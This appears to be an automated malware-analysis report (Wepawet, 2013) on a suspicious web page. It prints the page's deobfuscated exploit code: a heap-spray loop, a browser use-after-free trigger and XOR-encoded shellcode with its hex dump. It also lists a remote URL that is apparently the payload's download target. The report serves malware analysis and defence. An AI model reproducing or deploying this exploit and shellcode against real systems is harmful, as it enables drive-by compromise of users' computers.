Wepawet

Analysis report for file 1aea206aa64ebeabb07237f1e2230d0f

Sample Overview¶

File	ccc[1].ht_
MD5	1aea206aa64ebeabb07237f1e2230d0f
Analysis Started	2013-05-10 18:28:08
Report Generated	2013-05-10 18:28:12
Jsand version	2.3.6

Detection results¶

Detector	Result
Jsand 2.3.6	suspicious

In particular, the following URL was found to contain malicious content:

file://1aea206aa64ebeabb07237f1e2230d0f/

Exploits¶

No exploits were identified.

Deobfuscation results¶

Evals

var n = unescape("%u0c0d%u0c0d");
while (n.length <= 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i < 200; i ++ ){
  x[i] = n + sc;
}

(repeated 1 time)

Writes

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, 
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, 
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364, 
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686, 
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693, 
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833, 
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224, 
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, 
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
  );
  cc = cc.replace(/@/g, ",");
  eval(cc);
  var x1 = new Array();
  for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
  }
  ;
  var e1 = null;
  function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
  }
  function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
  }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

(repeated 1 time)

Network Activity¶

Requests

URL
file://ccc[1].ht_
file://1aea206aa64ebeabb07237f1e2230d0f/aaa.gif

ActiveX controls¶

No objects/controls.

Shellcode¶

Hexadecimal	ASCII
90 90 eb 19 5b 4b 90 33 c9 90 80 7b 01 e9 75 01 c3 66 b9 7b 04 80 34 0b d8 e2 fa eb 05 e8 e2 ff ff ff 31 39 db d8 d8 87 bc 79 e8 d8 d8 d8 53 98 d4 53 a8 c4 75 53 b0 d0 53 2f b2 d7 81 30 59 db d8 d8 48 3a 20 b0 eb ea d8 d8 b0 8d ab bd aa 8c 53 9e d4 30 37 da d8 d8 53 30 b2 d9 81 30 b9 db d8 d8 3a 21 b0 b7 b6 d8 d8 b0 ad aa b4 b5 8c 53 9e d4 30 08 da d8 d8 53 30 b2 d9 81 30 9a db d8 d8 3a 21 b0 b4 eb ea d8 b0 ab b0 bd b4 8c 53 9e d4 30 69 da d8 d8 53 30 b2 d9 81 30 fb db d8 d8 3a 21 59 34 d8 d9 d8 d8 53 04 59 1b 58 d8 d8 d8 b2 d8 b2 c2 8b b2 d8 27 8e 9c eb 18 98 58 e4 db d8 ad 21 51 5e 48 d8 d8 d8 1f dc db 84 b9 f6 bd 1f 9c db dc a0 bd d8 d8 eb 11 89 89 8b 8f 89 eb 18 53 9e 98 30 86 da d8 d8 5b 20 d8 d7 5d a7 d9 d8 d8 b2 d8 b2 d8 b2 db b2 d8 b2 da b0 d8 d8 d8 18 8b 53 9e fc 30 e5 da d8 d8 5b 20 27 d7 5c 86 d9 d8 d8 51 9e b8 b2 d8 88 27 8e f0 51 9e bc 53 5e 48 d8 d8 d8 1f dc db 84 ba f6 bd 1f 9c db dc a0 bd d8 d8 b2 d8 b2 d8 b2 da b2 d8 b2 d8 b0 d8 d8 d8 98 8b 53 9e fc 30 23 d9 d8 d8 5b 20 27 d7 5c c4 d9 d8 d8 51 5e 5c d8 d8 d8 51 46 54 d8 d8 d8 53 9e b8 b2 d8 b2 d8 b2 d8 53 9e b8 88 27 8e e0 1f 9e a8 d8 d8 d8 d8 1f 9e ac d8 d8 d8 d8 59 1f d8 da d8 d8 eb 03 53 86 bc b2 d8 55 9e a8 88 b0 d8 dc d8 d8 8f 27 ae b8 27 8e dc eb 11 61 d8 dc d8 d8 58 a4 d7 27 4d ac d4 58 a4 d7 27 d8 ac dd 58 ac d7 27 4d 3a 33 53 1b f5 d8 dc d8 d8 5b 20 d8 a7 db 51 86 a8 b2 d8 55 9e ac 88 27 ae a8 8f 27 6e 5c d8 d8 d8 27 8e e8 59 33 d8 dc d8 d8 5b 23 d8 a7 7d 27 ae b8 27 8e ec 27 6e 5c d8 d8 d8 27 8e ec 53 5e 48 d8 d8 d8 53 46 54 d8 d8 d8 1f dc db 84 b9 f6 bd 8b 27 8e f4 53 66 54 d8 d8 d8 53 5e 48 d8 d8 d8 1f dc df 84 ba f6 bd 59 34 d8 d9 d8 d8 53 04 b0 d8 d9 d8 d8 8b b0 d8 d9 d8 d8 8f b2 d8 b2 d8 27 8e c4 53 23 eb 18 eb 03 59 34 d8 da d8 d8 53 14 5b 20 8c a5 d0 51 c4 d9 5b 18 dc 33 2b 53 14 53 01 5b 1b c8 eb 18 88 89 8b 88 88 88 88 88 88 8f 88 88 53 9e d0 30 2f d8 d8 d8 53 a6 e4 30 ec d9 d8 d8 30 ef d8 d8 d8 b0 bb ae af d8 b0 ab b0 bc b7 8c 53 9e d4 30 6e d8 d8 d8 51 9e e4 bc 79 dc d8 d8 d8 55 78 b8 27 27 27 b2 bd 27 ae e4 53 9e c8 30 42 d8 d8 d8 eb 03 8b 8b 8b 8b 27 08 30 3d d8 d8 d8 59 34 d8 d9 d8 d8 53 24 5b 1f dc 1f df ea ac 49 d4 1f 9f dc bb 51 09 97 1f 9f d0 78 bd 4f 13 1f 9f d4 89 98 62 a7 1f 9f c8 e6 c5 6e e1 1f 9f cc 60 b1 0c c3 1f 9f c0 66 a7 be 78 1f 9f c4 24 71 ef 75 1f 9f f8 40 d2 c8 20 bc 79 e8 d8 d8 d8 53 98 d4 53 a8 c4 75 53 b0 d0 53 2f 51 8e bc b2 dc 81 30 7b d8 d8 d8 48 3a 20 b0 eb ea d8 d8 b0 8d ab bd aa 8c 53 de 30 ca d8 d8 d8 53 30 b2 dd 81 30 5c d8 d8 d8 3a 21 eb 27 8f 27 8e dc 58 e0 30 58 e0 31 ad c9 59 a0 dd 48 48 48 48 ac d0 53 27 8d 53 34 55 98 dd 27 38 30 e0 d8 d8 d8 1b 58 e0 30 58 e0 31 ad c9 59 a0 dd 48 48 48 48 ac 3f b0 d0 d2 d8 d8 55 98 dd 27 38 30 cf d8 d8 d8 1b 30 c9 d8 d8 d8 60 c9 d9 dc 58 1a d4 d8 33 da 80 1b 30 21 27 27 27 83 1e df 60 51 87 d9 be 1f 9f dd 27 38 1b 8b 53 04 8b b2 98 b0 d8 c8 d8 d8 8f 53 9e f8 30 5e 27 27 27 80 1b 89 8e 53 ad e4 53 ac f6 a0 db 2d 8e 53 ae f8 db 2d eb 11 91 99 75 db 1d eb 03 d7 66 c8 e2 0e ac d0 19 13 df db 02 98 33 29 e3 c7 ad 3f 86 53 86 fc db 05 be 53 d4 93 53 86 c4 db 05 53 dc 53 db 1d 73 86 81 1b 30 c2 24 27 27 6a 2a 3a 2c 6a ee d7 cb 28 90 a3 e5 ea ac 49 d4 5d 07 77 63 bb 51 09 97 89 98 62 a7 df 4a fa a8 c6 7c bc 37 4b ea 3c 4c 56 cb d2 74 a1 e1 3e 40 1c 55 c7 ac 8f be d5 27 9b 66 74 03 40 d2 c8 20 58 0e 77 42 23 8b cd be b0 ac ac a8 e2 f7 f7 bc bd b5 b7 e9 f6 be ac a8 b9 bb bb bd ab ab f6 bb bb f7 bc bd b5 b7 f7 b9 bc f6 b2 a8 bf d8 00	....[K.3...{..u. .f.{..4......... ..19.....y....S. .S..uS..S/...0Y. ..H:............ S..07...S0...0.. ..:!...........S ..0....S0...0... .:!...........S. .0i...S0...0.... :!Y4....S.Y.X... .......'.....X.. ..!Q^H.......... ................ .S..0....[...].. ................ ..S..0....[.'.\. ...Q.....'..Q..S ^H.............. ................ ....S..0#...[.'. \....Q^\...QFT.. .S........S...'. ...............Y .......S....U... ......'..'....a. ...X..'M..X..'.. .X..'M:3S......[ ....Q....U...'.. .'n\...'..Y3.... [#..}'..'..'n\.. .'..S^H...SFT... ........'..SfT.. .S^H..........Y4 ....S........... ......'..S#....Y 4....S.[....Q..[ ..3+S.S.[....... .........S..0/.. .S..0....0...... .........S..0n.. .Q...y....Ux.''' ..'..S..0B...... ...'.0=...Y4.... S$[......I.....Q .....x.O......b. .....n....`..... .f..x...$q.u...@ ....y....S..S..u S..S/Q.....0{... H:............S. 0....S0...0\...: !.'.'..X.0X.1..Y ..HHHH..S'.S4U.. '80.....X.0X.1.. Y..HHHH.?.....U. .'80.....0....`. ..X...3...0!'''. ..`Q......'8..S. .........S..0^'' '....S..S....-.S ...-....u.....f. ..........3)...? .S.....S..S....S .S..s...0.$''j*: ,j...(.....I.].w c.Q....b..J...\|. 7K.<LV..t..>@.U. ....'.ft.@...X.w B#.............. ................ ............

Hexadecimal

ASCII

90 90 eb 19 5b 4b 90 33  c9 90 80 7b 01 e9 75 01 
c3 66 b9 7b 04 80 34 0b  d8 e2 fa eb 05 e8 e2 ff 
ff ff 31 39 db d8 d8 87  bc 79 e8 d8 d8 d8 53 98 
d4 53 a8 c4 75 53 b0 d0  53 2f b2 d7 81 30 59 db 
d8 d8 48 3a 20 b0 eb ea  d8 d8 b0 8d ab bd aa 8c 
53 9e d4 30 37 da d8 d8  53 30 b2 d9 81 30 b9 db 
d8 d8 3a 21 b0 b7 b6 d8  d8 b0 ad aa b4 b5 8c 53 
9e d4 30 08 da d8 d8 53  30 b2 d9 81 30 9a db d8 
d8 3a 21 b0 b4 eb ea d8  b0 ab b0 bd b4 8c 53 9e 
d4 30 69 da d8 d8 53 30  b2 d9 81 30 fb db d8 d8 
3a 21 59 34 d8 d9 d8 d8  53 04 59 1b 58 d8 d8 d8 
b2 d8 b2 c2 8b b2 d8 27  8e 9c eb 18 98 58 e4 db 
d8 ad 21 51 5e 48 d8 d8  d8 1f dc db 84 b9 f6 bd 
1f 9c db dc a0 bd d8 d8  eb 11 89 89 8b 8f 89 eb 
18 53 9e 98 30 86 da d8  d8 5b 20 d8 d7 5d a7 d9 
d8 d8 b2 d8 b2 d8 b2 db  b2 d8 b2 da b0 d8 d8 d8 
18 8b 53 9e fc 30 e5 da  d8 d8 5b 20 27 d7 5c 86 
d9 d8 d8 51 9e b8 b2 d8  88 27 8e f0 51 9e bc 53 
5e 48 d8 d8 d8 1f dc db  84 ba f6 bd 1f 9c db dc 
a0 bd d8 d8 b2 d8 b2 d8  b2 da b2 d8 b2 d8 b0 d8 
d8 d8 98 8b 53 9e fc 30  23 d9 d8 d8 5b 20 27 d7 
5c c4 d9 d8 d8 51 5e 5c  d8 d8 d8 51 46 54 d8 d8 
d8 53 9e b8 b2 d8 b2 d8  b2 d8 53 9e b8 88 27 8e 
e0 1f 9e a8 d8 d8 d8 d8  1f 9e ac d8 d8 d8 d8 59 
1f d8 da d8 d8 eb 03 53  86 bc b2 d8 55 9e a8 88 
b0 d8 dc d8 d8 8f 27 ae  b8 27 8e dc eb 11 61 d8 
dc d8 d8 58 a4 d7 27 4d  ac d4 58 a4 d7 27 d8 ac 
dd 58 ac d7 27 4d 3a 33  53 1b f5 d8 dc d8 d8 5b 
20 d8 a7 db 51 86 a8 b2  d8 55 9e ac 88 27 ae a8 
8f 27 6e 5c d8 d8 d8 27  8e e8 59 33 d8 dc d8 d8 
5b 23 d8 a7 7d 27 ae b8  27 8e ec 27 6e 5c d8 d8 
d8 27 8e ec 53 5e 48 d8  d8 d8 53 46 54 d8 d8 d8 
1f dc db 84 b9 f6 bd 8b  27 8e f4 53 66 54 d8 d8 
d8 53 5e 48 d8 d8 d8 1f  dc df 84 ba f6 bd 59 34 
d8 d9 d8 d8 53 04 b0 d8  d9 d8 d8 8b b0 d8 d9 d8 
d8 8f b2 d8 b2 d8 27 8e  c4 53 23 eb 18 eb 03 59 
34 d8 da d8 d8 53 14 5b  20 8c a5 d0 51 c4 d9 5b 
18 dc 33 2b 53 14 53 01  5b 1b c8 eb 18 88 89 8b 
88 88 88 88 88 88 8f 88  88 53 9e d0 30 2f d8 d8 
d8 53 a6 e4 30 ec d9 d8  d8 30 ef d8 d8 d8 b0 bb 
ae af d8 b0 ab b0 bc b7  8c 53 9e d4 30 6e d8 d8 
d8 51 9e e4 bc 79 dc d8  d8 d8 55 78 b8 27 27 27 
b2 bd 27 ae e4 53 9e c8  30 42 d8 d8 d8 eb 03 8b 
8b 8b 8b 27 08 30 3d d8  d8 d8 59 34 d8 d9 d8 d8 
53 24 5b 1f dc 1f df ea  ac 49 d4 1f 9f dc bb 51 
09 97 1f 9f d0 78 bd 4f  13 1f 9f d4 89 98 62 a7 
1f 9f c8 e6 c5 6e e1 1f  9f cc 60 b1 0c c3 1f 9f 
c0 66 a7 be 78 1f 9f c4  24 71 ef 75 1f 9f f8 40 
d2 c8 20 bc 79 e8 d8 d8  d8 53 98 d4 53 a8 c4 75 
53 b0 d0 53 2f 51 8e bc  b2 dc 81 30 7b d8 d8 d8 
48 3a 20 b0 eb ea d8 d8  b0 8d ab bd aa 8c 53 de 
30 ca d8 d8 d8 53 30 b2  dd 81 30 5c d8 d8 d8 3a 
21 eb 27 8f 27 8e dc 58  e0 30 58 e0 31 ad c9 59 
a0 dd 48 48 48 48 ac d0  53 27 8d 53 34 55 98 dd 
27 38 30 e0 d8 d8 d8 1b  58 e0 30 58 e0 31 ad c9 
59 a0 dd 48 48 48 48 ac  3f b0 d0 d2 d8 d8 55 98 
dd 27 38 30 cf d8 d8 d8  1b 30 c9 d8 d8 d8 60 c9 
d9 dc 58 1a d4 d8 33 da  80 1b 30 21 27 27 27 83 
1e df 60 51 87 d9 be 1f  9f dd 27 38 1b 8b 53 04 
8b b2 98 b0 d8 c8 d8 d8  8f 53 9e f8 30 5e 27 27 
27 80 1b 89 8e 53 ad e4  53 ac f6 a0 db 2d 8e 53 
ae f8 db 2d eb 11 91 99  75 db 1d eb 03 d7 66 c8 
e2 0e ac d0 19 13 df db  02 98 33 29 e3 c7 ad 3f 
86 53 86 fc db 05 be 53  d4 93 53 86 c4 db 05 53 
dc 53 db 1d 73 86 81 1b  30 c2 24 27 27 6a 2a 3a 
2c 6a ee d7 cb 28 90 a3  e5 ea ac 49 d4 5d 07 77 
63 bb 51 09 97 89 98 62  a7 df 4a fa a8 c6 7c bc 
37 4b ea 3c 4c 56 cb d2  74 a1 e1 3e 40 1c 55 c7 
ac 8f be d5 27 9b 66 74  03 40 d2 c8 20 58 0e 77 
42 23 8b cd be b0 ac ac  a8 e2 f7 f7 bc bd b5 b7 
e9 f6 be ac a8 b9 bb bb  bd ab ab f6 bb bb f7 bc 
bd b5 b7 f7 b9 bc f6 b2  a8 bf d8 00

....[K.3...{..u.
.f.{..4.........
..19.....y....S.
.S..uS..S/...0Y.
..H:............
S..07...S0...0..
..:!...........S
..0....S0...0...
.:!...........S.
.0i...S0...0....
:!Y4....S.Y.X...
.......'.....X..
..!Q^H..........
................
.S..0....[...]..
................
..S..0....[.'.\.
...Q.....'..Q..S
^H..............
................
....S..0#...[.'.
\....Q^\...QFT..
.S........S...'.
...............Y
.......S....U...
......'..'....a.
...X..'M..X..'..
.X..'M:3S......[
....Q....U...'..
.'n\...'..Y3....
[#..}'..'..'n\..
.'..S^H...SFT...
........'..SfT..
.S^H..........Y4
....S...........
......'..S#....Y
4....S.[....Q..[
..3+S.S.[.......
.........S..0/..
.S..0....0......
.........S..0n..
.Q...y....Ux.'''
..'..S..0B......
...'.0=...Y4....
S$[......I.....Q
.....x.O......b.
.....n....`.....
.f..x...$q.u...@
....y....S..S..u
S..S/Q.....0{...
H:............S.
0....S0...0\...:
!.'.'..X.0X.1..Y
..HHHH..S'.S4U..
'80.....X.0X.1..
Y..HHHH.?.....U.
.'80.....0....`.
..X...3...0!'''.
..`Q......'8..S.
.........S..0^''
'....S..S....-.S
...-....u.....f.
..........3)...?
.S.....S..S....S
.S..s...0.$''j*:
,j...(.....I.].w
c.Q....b..J...|.
7K.<LV..t..>@.U.
....'.ft.@...X.w
B#..............
................
............

This shellcode was found on file://1aea206aa64ebeabb07237f1e2230d0f/.

(shellzer's analysis not available: an error was encountered when analyzing this shellcode.)

Malware¶

Additional (potential) malware:

URL	Type	Hash	Analysis
http://demo1.ftpaccess.cc/demo/ad.jpg	N/A	N/A

FEEDBACK